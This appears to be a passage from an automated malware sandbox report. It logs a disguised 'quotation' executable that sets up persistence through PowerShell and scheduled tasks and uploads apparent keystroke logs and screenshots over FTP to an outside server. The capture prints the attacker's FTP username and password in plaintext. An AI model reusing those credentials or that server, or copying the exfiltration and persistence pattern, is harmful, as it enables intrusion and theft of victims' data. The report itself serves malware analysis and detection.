Sep 27, 2024 13:11:39.040805101 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 | PASV |
Sep 27, 2024 13:11:39.378043890 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 | 227 Entering Passive Mode (110,4,45,197,204,216) |
Sep 27, 2024 13:11:39.386344910 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 | STOR KL_user-849224_2024_10_15_03_01_59.html |
Sep 27, 2024 13:11:40.304414988 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 | 150 Accepted data connection |
Sep 27, 2024 13:11:40.667108059 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 | 226-File successfully transferred 226-File successfully transferred226 0.361 seconds (measured here), 0.76 Kbytes per second |
Sep 27, 2024 13:11:58.709117889 CEST | 49756 | 21 | 192.168.2.4 | 110.4.45.197 | PASV |
Sep 27, 2024 13:11:59.099595070 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 | 227 Entering Passive Mode (110,4,45,197,204,104) |
Sep 27, 2024 13:11:59.110579967 CEST | 49756 | 21 | 192.168.2.4 | 110.4.45.197 | STOR SC_user-849224_2024_10_14_02_30_34.jpeg |
Sep 27, 2024 13:11:59.945193052 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 | 150 Accepted data connection |
Sep 27, 2024 13:12:00.780853033 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 | 226-File successfully transferred 226-File successfully transferred226 0.836 seconds (measured here), 66.92 Kbytes per second |
Sep 27, 2024 13:12:01.023907900 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 | 226-File successfully transferred 226-File successfully transferred226 0.836 seconds (measured here), 66.92 Kbytes per second |
Sep 27, 2024 13:12:19.012639999 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 | PASV |
Sep 27, 2024 13:12:19.463406086 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 | 227 Entering Passive Mode (110,4,45,197,218,150) |
Sep 27, 2024 13:12:19.528964043 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 | STOR SC_user-849224_2024_11_03_04_07_46.jpeg |
Sep 27, 2024 13:12:19.748332024 CEST | 49756 | 21 | 192.168.2.4 | 110.4.45.197 | PASV |
Sep 27, 2024 13:12:20.253776073 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 | 227 Entering Passive Mode (110,4,45,197,244,97) |
Sep 27, 2024 13:12:20.294255972 CEST | 49756 | 21 | 192.168.2.4 | 110.4.45.197 | STOR SC_user-849224_2024_10_25_12_14_45.jpeg |
Sep 27, 2024 13:12:20.528198004 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 | 150 Accepted data connection |
Sep 27, 2024 13:12:20.766846895 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 | 150 Accepted data connection |
Sep 27, 2024 13:12:21.233882904 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 | 150 Accepted data connection |
Sep 27, 2024 13:12:21.349622011 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 | 226-File successfully transferred 226-File successfully transferred226 0.802 seconds (measured here), 69.67 Kbytes per second |
Sep 27, 2024 13:12:22.146176100 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 | 226-File successfully transferred 226-File successfully transferred226 0.937 seconds (measured here), 59.65 Kbytes per second |
Sep 27, 2024 13:12:26.871378899 CEST | 49756 | 21 | 192.168.2.4 | 110.4.45.197 | PASV |
Sep 27, 2024 13:12:27.250178099 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 | 227 Entering Passive Mode (110,4,45,197,240,84) |
Sep 27, 2024 13:12:27.264462948 CEST | 49756 | 21 | 192.168.2.4 | 110.4.45.197 | STOR SC_user-849224_2024_10_30_18_53_08.jpeg |
Sep 27, 2024 13:12:28.204030037 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 | 150 Accepted data connection |
Sep 27, 2024 13:12:29.347023964 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 | 226-File successfully transferred 226-File successfully transferred226 0.971 seconds (measured here), 57.55 Kbytes per second |
Sep 27, 2024 13:12:29.463661909 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 | 226-File successfully transferred 226-File successfully transferred226 0.971 seconds (measured here), 57.55 Kbytes per second |
Sep 27, 2024 13:12:30.072341919 CEST | 49756 | 21 | 192.168.2.4 | 110.4.45.197 | PASV |
Sep 27, 2024 13:12:30.461297035 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 | 227 Entering Passive Mode (110,4,45,197,218,16) |
Sep 27, 2024 13:12:30.466968060 CEST | 49756 | 21 | 192.168.2.4 | 110.4.45.197 | STOR SC_user-849224_2024_11_05_10_22_41.jpeg |
Sep 27, 2024 13:12:31.309773922 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 | 150 Accepted data connection |
Sep 27, 2024 13:12:32.126585960 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 | 226-File successfully transferred 226-File successfully transferred226 0.818 seconds (measured here), 68.35 Kbytes per second |
Sep 27, 2024 13:12:37.840342999 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 | PASV |
Sep 27, 2024 13:12:38.203234911 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 | 227 Entering Passive Mode (110,4,45,197,250,130) |
Sep 27, 2024 13:12:38.208956003 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 | STOR SC_user-849224_2024_11_14_11_04_28.jpeg |
Sep 27, 2024 13:12:38.216949940 CEST | 49756 | 21 | 192.168.2.4 | 110.4.45.197 | PASV |
Sep 27, 2024 13:12:38.587141991 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 | 227 Entering Passive Mode (110,4,45,197,216,142) |
Sep 27, 2024 13:12:38.592953920 CEST | 49756 | 21 | 192.168.2.4 | 110.4.45.197 | STOR SC_user-849224_2024_11_11_04_13_22.jpeg |
Sep 27, 2024 13:12:39.049989939 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 | 150 Accepted data connection |
Sep 27, 2024 13:12:39.521429062 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 | 150 Accepted data connection |
Sep 27, 2024 13:12:39.848197937 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 | 226-File successfully transferred 226-File successfully transferred226 0.802 seconds (measured here), 69.67 Kbytes per second |
Sep 27, 2024 13:12:40.469153881 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 | 226-File successfully transferred 226-File successfully transferred226 0.946 seconds (measured here), 59.07 Kbytes per second |
Sep 27, 2024 13:12:45.103346109 CEST | 49756 | 21 | 192.168.2.4 | 110.4.45.197 | PASV |
Sep 27, 2024 13:12:45.459942102 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 | 227 Entering Passive Mode (110,4,45,197,217,216) |
Sep 27, 2024 13:12:45.467314959 CEST | 49756 | 21 | 192.168.2.4 | 110.4.45.197 | STOR SC_user-849224_2024_11_18_13_13_57.jpeg |
Sep 27, 2024 13:12:46.360636950 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 | 150 Accepted data connection |
Sep 27, 2024 13:12:47.265567064 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 | 226-File successfully transferred 226-File successfully transferred226 0.905 seconds (measured here), 61.79 Kbytes per second |
Sep 27, 2024 13:12:53.126218081 CEST | 21 | 49777 | 110.4.45.197 | 192.168.2.4 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 13 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 13 of 50 allowed.220-Local time is now 19:12. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 13 of 50 allowed.220-Local time is now 19:12. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 13 of 50 allowed.220-Local time is now 19:12. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 13 of 50 allowed.220-Local time is now 19:12. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity. |
Sep 27, 2024 13:12:53.126368999 CEST | 49777 | 21 | 192.168.2.4 | 110.4.45.197 | USER origin@haliza.com.my |
Sep 27, 2024 13:12:53.454895973 CEST | 21 | 49777 | 110.4.45.197 | 192.168.2.4 | 331 User origin@haliza.com.my OK. Password required |
Sep 27, 2024 13:12:53.456473112 CEST | 49777 | 21 | 192.168.2.4 | 110.4.45.197 | PASS JesusChrist007$ |
Sep 27, 2024 13:12:53.820796013 CEST | 21 | 49777 | 110.4.45.197 | 192.168.2.4 | 230 OK. Current restricted directory is / |
Sep 27, 2024 13:12:54.150491953 CEST | 21 | 49777 | 110.4.45.197 | 192.168.2.4 | 504 Unknown command |
Sep 27, 2024 13:12:54.152523041 CEST | 49777 | 21 | 192.168.2.4 | 110.4.45.197 | PWD |
Sep 27, 2024 13:12:54.480330944 CEST | 21 | 49777 | 110.4.45.197 | 192.168.2.4 | 257 "/" is your current location |
Sep 27, 2024 13:12:54.480482101 CEST | 49777 | 21 | 192.168.2.4 | 110.4.45.197 | TYPE I |
Sep 27, 2024 13:12:54.806366920 CEST | 21 | 49777 | 110.4.45.197 | 192.168.2.4 | 200 TYPE is now 8-bit binary |
Sep 27, 2024 13:12:54.806555033 CEST | 49777 | 21 | 192.168.2.4 | 110.4.45.197 | PASV |
Sep 27, 2024 13:12:55.133074045 CEST | 21 | 49777 | 110.4.45.197 | 192.168.2.4 | 227 Entering Passive Mode (110,4,45,197,228,252) |
Sep 27, 2024 13:12:55.138752937 CEST | 49777 | 21 | 192.168.2.4 | 110.4.45.197 | STOR SC_user-849224_2024_11_23_20_57_19.jpeg |
Sep 27, 2024 13:12:56.066729069 CEST | 21 | 49777 | 110.4.45.197 | 192.168.2.4 | 150 Accepted data connection |
Sep 27, 2024 13:12:56.997684002 CEST | 21 | 49777 | 110.4.45.197 | 192.168.2.4 | 226-File successfully transferred 226-File successfully transferred226 0.931 seconds (measured here), 65.26 Kbytes per second |
Sep 27, 2024 13:12:57.608388901 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 | PASV |
Sep 27, 2024 13:12:57.973038912 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 | 227 Entering Passive Mode (110,4,45,197,224,62) |
Sep 27, 2024 13:12:57.981863976 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 | STOR SC_user-849224_2024_11_25_03_40_54.jpeg |
Sep 27, 2024 13:12:58.811820030 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 | 150 Accepted data connection |
Sep 27, 2024 13:12:59.608923912 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 | 226-File successfully transferred 226-File successfully transferred226 0.804 seconds (measured here), 69.50 Kbytes per second |
Sep 27, 2024 13:13:26.072145939 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 | PASV |
Sep 27, 2024 13:13:26.452203989 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 | 227 Entering Passive Mode (110,4,45,197,201,90) |
Sep 27, 2024 13:13:26.460886002 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 | STOR SC_user-849224_2024_12_14_01_34_56.jpeg |
Sep 27, 2024 13:13:27.453784943 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 | 150 Accepted data connection |
Sep 27, 2024 13:13:28.407711029 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 | 226-File successfully transferred 226-File successfully transferred226 0.934 seconds (measured here), 59.88 Kbytes per second |
Sep 27, 2024 13:13:44.648521900 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 | PASV |
Sep 27, 2024 13:13:45.057925940 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 | 227 Entering Passive Mode (110,4,45,197,221,92) |
Sep 27, 2024 13:13:45.077049971 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 | STOR SC_user-849224_2024_12_24_06_30_21.jpeg |
Sep 27, 2024 13:13:45.984015942 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 | 150 Accepted data connection |
Sep 27, 2024 13:13:46.922559023 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 | 226-File successfully transferred 226-File successfully transferred226 0.931 seconds (measured here), 60.04 Kbytes per second |
Sep 27, 2024 13:13:52.715584040 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 | PASV |
Sep 27, 2024 13:13:53.077083111 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 | 227 Entering Passive Mode (110,4,45,197,241,63) |
Sep 27, 2024 13:13:53.082746029 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 | STOR SC_user-849224_2024_12_29_21_58_53.jpeg |
Sep 27, 2024 13:13:53.906615019 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 | 150 Accepted data connection |
Sep 27, 2024 13:13:54.731836081 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 | 226-File successfully transferred 226-File successfully transferred226 0.798 seconds (measured here), 70.09 Kbytes per second |
Sep 27, 2024 13:14:02.400526047 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 | PASV |
Sep 27, 2024 13:14:02.839585066 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 | 227 Entering Passive Mode (110,4,45,197,250,95) |
Sep 27, 2024 13:14:02.845113993 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 | STOR SC_user-849224_2025_01_07_06_50_58.jpeg |
Sep 27, 2024 13:14:03.993027925 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 | 150 Accepted data connection |
Sep 27, 2024 13:14:04.215801001 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 | 150 Accepted data connection |
Sep 27, 2024 13:14:05.018769026 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 | 226-File successfully transferred 226-File successfully transferred226 1.343 seconds (measured here), 41.63 Kbytes per second |
Sep 27, 2024 13:14:12.806090117 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 | PASV |
Sep 27, 2024 13:14:13.186691046 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 | 227 Entering Passive Mode (110,4,45,197,242,137) |
Sep 27, 2024 13:14:13.192327976 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 | STOR SC_user-849224_2024_09_27_07_14_12.jpeg |
Sep 27, 2024 13:14:13.666157007 CEST | 21 | 49790 | 110.4.45.197 | 192.168.2.4 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 14 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 14 of 50 allowed.220-Local time is now 19:14. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 14 of 50 allowed.220-Local time is now 19:14. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 14 of 50 allowed.220-Local time is now 19:14. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 14 of 50 allowed.220-Local time is now 19:14. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity. |
Sep 27, 2024 13:14:13.666340113 CEST | 49790 | 21 | 192.168.2.4 | 110.4.45.197 | USER origin@haliza.com.my |
Sep 27, 2024 13:14:13.965307951 CEST | 21 | 49791 | 110.4.45.197 | 192.168.2.4 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 15 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 15 of 50 allowed.220-Local time is now 19:14. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 15 of 50 allowed.220-Local time is now 19:14. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 15 of 50 allowed.220-Local time is now 19:14. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 15 of 50 allowed.220-Local time is now 19:14. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity. |
Sep 27, 2024 13:14:13.965465069 CEST | 49791 | 21 | 192.168.2.4 | 110.4.45.197 | USER origin@haliza.com.my |
Sep 27, 2024 13:14:14.024213076 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 | 150 Accepted data connection |
Sep 27, 2024 13:14:14.053566933 CEST | 21 | 49790 | 110.4.45.197 | 192.168.2.4 | 331 User origin@haliza.com.my OK. Password required |
Sep 27, 2024 13:14:14.053886890 CEST | 49790 | 21 | 192.168.2.4 | 110.4.45.197 | PASS JesusChrist007$ |
Sep 27, 2024 13:14:14.334882975 CEST | 21 | 49791 | 110.4.45.197 | 192.168.2.4 | 331 User origin@haliza.com.my OK. Password required |
Sep 27, 2024 13:14:14.335005045 CEST | 49791 | 21 | 192.168.2.4 | 110.4.45.197 | PASS JesusChrist007$ |
Sep 27, 2024 13:14:14.443470001 CEST | 21 | 49790 | 110.4.45.197 | 192.168.2.4 | 230 OK. Current restricted directory is / |
Sep 27, 2024 13:14:14.713192940 CEST | 21 | 49791 | 110.4.45.197 | 192.168.2.4 | 230 OK. Current restricted directory is / |
Sep 27, 2024 13:14:14.776681900 CEST | 21 | 49790 | 110.4.45.197 | 192.168.2.4 | 504 Unknown command |
Sep 27, 2024 13:14:14.831434011 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 | 226-File successfully transferred 226-File successfully transferred226 0.810 seconds (measured here), 69.05 Kbytes per second |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 07:09:57 |
Start date: | 27/09/2024 |
Path: | C:\Users\user\Desktop\rQuotation3200025006.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x1f0000 |
File size: | 645'120 bytes |
MD5 hash: | 36C4BFF0F1CDCDA62DA9229500CA1E38 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Reputation: | low |
Has exited: | true |
Target ID: | 2 |
Start time: | 07:10:00 |
Start date: | 27/09/2024 |
Path: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x880000 |
File size: | 433'152 bytes |
MD5 hash: | C32CA4ACFCC635EC1EA6ED8A34DF5FAC |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 3 |
Start time: | 07:10:00 |
Start date: | 27/09/2024 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7699e0000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 4 |
Start time: | 07:10:00 |
Start date: | 27/09/2024 |
Path: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x880000 |
File size: | 433'152 bytes |
MD5 hash: | C32CA4ACFCC635EC1EA6ED8A34DF5FAC |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 5 |
Start time: | 07:10:00 |
Start date: | 27/09/2024 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7699e0000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 6 |
Start time: | 07:10:00 |
Start date: | 27/09/2024 |
Path: | C:\Windows\SysWOW64\schtasks.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x6f0000 |
File size: | 187'904 bytes |
MD5 hash: | 48C2FE20575769DE916F48EF0676A965 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 7 |
Start time: | 07:10:00 |
Start date: | 27/09/2024 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7699e0000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 8 |
Start time: | 07:10:00 |
Start date: | 27/09/2024 |
Path: | C:\Users\user\Desktop\rQuotation3200025006.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x8c0000 |
File size: | 645'120 bytes |
MD5 hash: | 36C4BFF0F1CDCDA62DA9229500CA1E38 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Reputation: | low |
Has exited: | false |
Target ID: | 9 |
Start time: | 07:10:03 |
Start date: | 27/09/2024 |
Path: | C:\Users\user\AppData\Roaming\pBBqGOzrz.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x1c0000 |
File size: | 645'120 bytes |
MD5 hash: | 36C4BFF0F1CDCDA62DA9229500CA1E38 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Antivirus matches: |
|
Reputation: | low |
Has exited: | true |
Target ID: | 10 |
Start time: | 07:10:10 |
Start date: | 27/09/2024 |
Path: | C:\Windows\SysWOW64\schtasks.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x6f0000 |
File size: | 187'904 bytes |
MD5 hash: | 48C2FE20575769DE916F48EF0676A965 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 11 |
Start time: | 07:10:09 |
Start date: | 27/09/2024 |
Path: | C:\Windows\System32\wbem\WmiPrvSE.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff693ab0000 |
File size: | 496'640 bytes |
MD5 hash: | 60FF40CFD7FB8FE41EE4FE9AE5FE1C51 |
Has elevated privileges: | true |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 12 |
Start time: | 07:10:10 |
Start date: | 27/09/2024 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7699e0000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 13 |
Start time: | 07:10:11 |
Start date: | 27/09/2024 |
Path: | C:\Users\user\AppData\Roaming\pBBqGOzrz.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x180000 |
File size: | 645'120 bytes |
MD5 hash: | 36C4BFF0F1CDCDA62DA9229500CA1E38 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | low |
Has exited: | true |
Target ID: | 14 |
Start time: | 07:10:11 |
Start date: | 27/09/2024 |
Path: | C:\Users\user\AppData\Roaming\pBBqGOzrz.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xff0000 |
File size: | 645'120 bytes |
MD5 hash: | 36C4BFF0F1CDCDA62DA9229500CA1E38 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Reputation: | low |
Has exited: | false |
Target ID: | 16 |
Start time: | 07:10:16 |
Start date: | 27/09/2024 |
Path: | C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x90000 |
File size: | 645'120 bytes |
MD5 hash: | 36C4BFF0F1CDCDA62DA9229500CA1E38 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Antivirus matches: |
|
Reputation: | low |
Has exited: | true |
Target ID: | 17 |
Start time: | 07:10:17 |
Start date: | 27/09/2024 |
Path: | C:\Windows\SysWOW64\schtasks.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x6f0000 |
File size: | 187'904 bytes |
MD5 hash: | 48C2FE20575769DE916F48EF0676A965 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 18 |
Start time: | 07:10:17 |
Start date: | 27/09/2024 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7699e0000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Has exited: | true |
Target ID: | 19 |
Start time: | 07:10:17 |
Start date: | 27/09/2024 |
Path: | C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x2f0000 |
File size: | 645'120 bytes |
MD5 hash: | 36C4BFF0F1CDCDA62DA9229500CA1E38 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Has exited: | true |
Target ID: | 20 |
Start time: | 07:10:17 |
Start date: | 27/09/2024 |
Path: | C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xc0000 |
File size: | 645'120 bytes |
MD5 hash: | 36C4BFF0F1CDCDA62DA9229500CA1E38 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Has exited: | true |
Target ID: | 21 |
Start time: | 07:10:17 |
Start date: | 27/09/2024 |
Path: | C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x240000 |
File size: | 645'120 bytes |
MD5 hash: | 36C4BFF0F1CDCDA62DA9229500CA1E38 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Has exited: | true |
Target ID: | 22 |
Start time: | 07:10:17 |
Start date: | 27/09/2024 |
Path: | C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xe80000 |
File size: | 645'120 bytes |
MD5 hash: | 36C4BFF0F1CDCDA62DA9229500CA1E38 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Has exited: | true |
Target ID: | 25 |
Start time: | 07:10:24 |
Start date: | 27/09/2024 |
Path: | C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x7ff70f330000 |
File size: | 645'120 bytes |
MD5 hash: | 36C4BFF0F1CDCDA62DA9229500CA1E38 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Has exited: | true |
Target ID: | 26 |
Start time: | 07:10:25 |
Start date: | 27/09/2024 |
Path: | C:\Windows\SysWOW64\schtasks.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x6f0000 |
File size: | 187'904 bytes |
MD5 hash: | 48C2FE20575769DE916F48EF0676A965 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Has exited: | true |
Target ID: | 27 |
Start time: | 07:10:25 |
Start date: | 27/09/2024 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7699e0000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Has exited: | true |
Target ID: | 28 |
Start time: | 07:10:25 |
Start date: | 27/09/2024 |
Path: | C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xfe0000 |
File size: | 645'120 bytes |
MD5 hash: | 36C4BFF0F1CDCDA62DA9229500CA1E38 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Has exited: | false |
Execution Graph
Execution Coverage: | 10.5% |
Dynamic/Decrypted Code Coverage: | 100% |
Signature Coverage: | 2.1% |
Total number of Nodes: | 143 |
Total number of Limit Nodes: | 13 |
Graph
Function 04BBB7D8 Relevance: .1, Instructions: 64COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
